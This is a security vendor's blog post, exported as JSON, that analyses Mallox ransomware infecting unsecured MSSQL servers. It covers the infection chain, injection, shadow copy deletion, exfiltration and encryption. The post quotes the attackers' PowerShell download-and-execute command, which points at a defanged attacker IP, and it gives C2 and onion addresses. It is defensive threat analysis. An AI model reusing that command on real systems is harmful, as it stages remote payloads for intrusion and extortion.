{"id":91936,"date":"2023-08-18T15:57:55","date_gmt":"2023-08-18T10:27:55","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=91936"},"modified":"2023-08-18T16:43:06","modified_gmt":"2023-08-18T11:13:06","slug":"mallox-ransomware-strikes-unsecured-mssql-servers","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/mallox-ransomware-strikes-unsecured-mssql-servers\/","title":{"rendered":"Mallox Ransomware Strikes Unsecured MSSQL Servers"},"content":{"rendered":"

Introduction:<\/strong><\/h3>\n

First observed in the middle of 2021, ‘Mallox’ Ransomware has emerged as a formidable threat in the cyber crime landscape. With its ability to encrypt all volumes, including local and network shared drives, it gradually spreads its control over the system, leaving victims in a state of digital despair.<\/p>\n

Mallox Ransomware uses the \u201c.mallox\u201d extension on the encrypted files as it drops its \u2018ransom note\u2019 with the name – \u201cFile Recovery.txt\u201d which contains the unique \u201ctor\u201d link for\u00a0 further communication between the attacker and the unsuspecting users.<\/p>\n

In this blog, we will take you deep into our research of the Mallox Ransomware, to help you understand how stealthily it works, as well as update you on how to stay protected from it.<\/p>\n

Attack Vector:<\/strong><\/h3>\n

Our investigation indicates that Mallox (aka TargetCompany) Ransomware is currently targeting unsecured Microsoft SQL Servers as an attack vector to infiltrate victims’ systems and distribute the ransomware.<\/p>\n

Furthermore, we have noticed multiple instances of failed and erroneous attempts on publicly exposed MSSQL servers to gain initial access to the victims’ network. This pattern is indicative of MSSQL brute force attacks, and also highlights the pivotal role these servers play as the primary point of entry into the victim\u2019s system.<\/p>\n

It is observed that, as it gains initial access to the unsecured MSSQL instance via brute force attacks, it uses MSSQL service \u2018sqlservr.exe\u2019 command line to infiltrate the malicious files and payload onto the victim’s machine.<\/p>\n

“C:\\WINDOWS\\\\System32\\\\cmd.exe” \/C echo $cl = New-Object System.Net.WebClient >%TEMP%\\updt.ps1 & echo $cl.DownloadFile(“http[:]\/\/43[.]138[.]76[.]102\/Mfhigwwvsie[.]bat”, “%TEMP%\\tzt.bat”) >> %TEMP%\\updt.ps1 & powershell -ExecutionPolicy Bypass %TEMP%\\updt.ps1 & WMIC process call create “%TEMP%\\tzt.bat”<\/em><\/p>\n

Infection Chain:<\/strong><\/h3>\n

During the execution of tzt.bat it injects the ransom code in the Aspnet_Complier.exe and then it drops and executes the killer.bat file which deletes all the unwanted services and kills all the tasks so that the encryption process is successful.<\/p>\n

\"\"
Fig1: Infection Chain\u00a0<\/em><\/figcaption><\/figure>\n

Technical Analysis of Payload:<\/strong><\/h3>\n

Bat file executes the .NET payload \u201cMfhigwwvise.exe\u201d; which is responsible for the injection of ransomware code.<\/p>\n

During the analysis of .NET payload, it was discovered that it downloads another encrypted VDF payload from the \u201chxxps:\/\/files.catbox.moe\/r6piiq.vdf, which is encrypted with AES Cipher – As shown in the figure below.<\/p>\n

This further decrypts directly into the memory.<\/p>\n

\"\"
Fig2: Downloading VDF from C2<\/em><\/figcaption><\/figure>\n
\"\"
Fig3: Decrypted VDF Payload<\/em><\/figcaption><\/figure>\n

The Decrypted DLL file is further obfuscated with an IntelliLock obfuscator. The loader now loads the decrypted ransomware DLL into another process using the process hollowing technique.<\/p>\n

After creating the thread pool, the loader then uses the InvokeMember() function to inject and execute the ransomware code into Aspnet Compler.exe.<\/p>\n

\"\"
Fig4: Invokes the DLL Function<\/em><\/figcaption><\/figure>\n

Technical Analysis of Injected Ransom Code:<\/strong><\/h3>\n

The injected payload pf the Mallox Ransomware is the main module that contains the country check, Deletion on of the shadow copy, Termination of running processes, and encryption.<\/p>\n

Firstly, It checks the default language ID for the current user to exclude some countries from the targeted attack.<\/p>\n

\"\"
Fig5: Checks for LangID<\/em><\/figcaption><\/figure>\n

It then creates the threads. The first thread will delete Registry keys and then it deletes the Shadow copy as shown in below:<\/p>\n

\"\"
Fig6: Deletion of Registration Keys<\/em><\/figcaption><\/figure>\n
\"\"
Fig7: Deletion of Shadow Copy<\/em><\/figcaption><\/figure>\n

The second thread will modify the Boot Configuration, and terminates some of the hardcoded processes.<\/p>\n

\"\"
Fig8: Use of BCD cmd for Boot Configuration<\/figcaption><\/figure>\n
\"\"
Fig9: Termination of Process<\/em><\/figcaption><\/figure>\n

After this, the third thread will remove SQL-Related Services\u2019 used command line. As shown in the figure below:<\/p>\n

\"\"
Fig10: Remove SQL-Related Services<\/em><\/figcaption><\/figure>\n

Upon attempting to shut down or reboot the PC, \u00a0it displays a warning message to the user stating: ‘Do NOT shutdown OR reboot your PC: this might damage your files permanently!’<\/em><\/p>\n

It modifies the Windows registry to prevent users from shutting down or restarting the system. By configuring specific registry values, it disables the Shutdown, Restart, and Sign-out options, effectively blocking users from performing these actions.<\/p>\n

\"\"
Fig11: Disables the System Options<\/em><\/figcaption><\/figure>\n

Exfiltration System Information<\/strong><\/p>\n

Mallox Ransomware can exfiltrate the data from a targeted system prior to its encryption. Similar to the prevailing approach of numerous other contemporary ransomware groups, it operates a website for the purpose of exposing data owned by victims who decline to meet their ransom demands. It collects system information and transfers it to the C2C.<\/p>\n

\"\"
Fig12: Exfiltration of Data Targeted System<\/em><\/figcaption><\/figure>\n
\"\"
Fig13: Connection to C2 Server<\/em><\/figcaption><\/figure>\n

Encryption:<\/strong><\/p>\n

Encryption threads are created based on the number of existing processors, with a maximum limit of 64 threads.<\/p>\n

\"\"
Fig14: Encryption Threads w.r.t No. Of Processor<\/em><\/figcaption><\/figure>\n

Folders and Files Exclusion:<\/strong><\/p>\n

It traverses all the folders and uses API \u201c<\/u>FindFirstFileExW\u201d<\/u>. to exclude the whitelisted folders. This helps the system work properly after encryption. Accordingly, it excludes the whitelisted files and extensions from the encryption process. It also excludes the ransom note \u201cFile Recovery.txt\u201d from the encryption process.\u202f\u00a0<\/span><\/p>\n

\"\"
Fig15: Comparing with Whitelisted Folders<\/em><\/figcaption><\/figure>\n
\"\"
Fig16: Comparing with Whitelisted Extensions<\/em><\/figcaption><\/figure>\n
\"\"
Fig17: Comparing with Whitelisted Files<\/em><\/figcaption><\/figure>\n
\"\"
Fig18: Comparing with Whitelisted Files<\/em><\/figcaption><\/figure>\n

The Ransomware note, labelled “File Recovery.txt<\/strong>“, is created in all the folders. This note provides an Onion link for communication with the attackers for decryption, as shown below:<\/p>\n

Run TOR browser and open the site:<\/strong><\/p>\n

Wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad[.]onion[\/]mallox[\/]privateSignin <\/em><\/strong><\/p>\n

\"\"
Fig 19: Creating Ransom Notes<\/em><\/figcaption><\/figure>\n

It uses sala20 Encryption algorithm to encrypt the samples<\/p>\n

\"\"
Fig20: Encryption Function<\/em><\/figcaption><\/figure>\n

After encryption, it appends \u201c.Mallox\u201d as a file extension.<\/p>\n

\"\"
Fig 21: Use of .Mallox File Extension<\/em><\/figcaption><\/figure>\n

Tips to Prevent Such Kinds of Attacks:<\/strong><\/h3>\n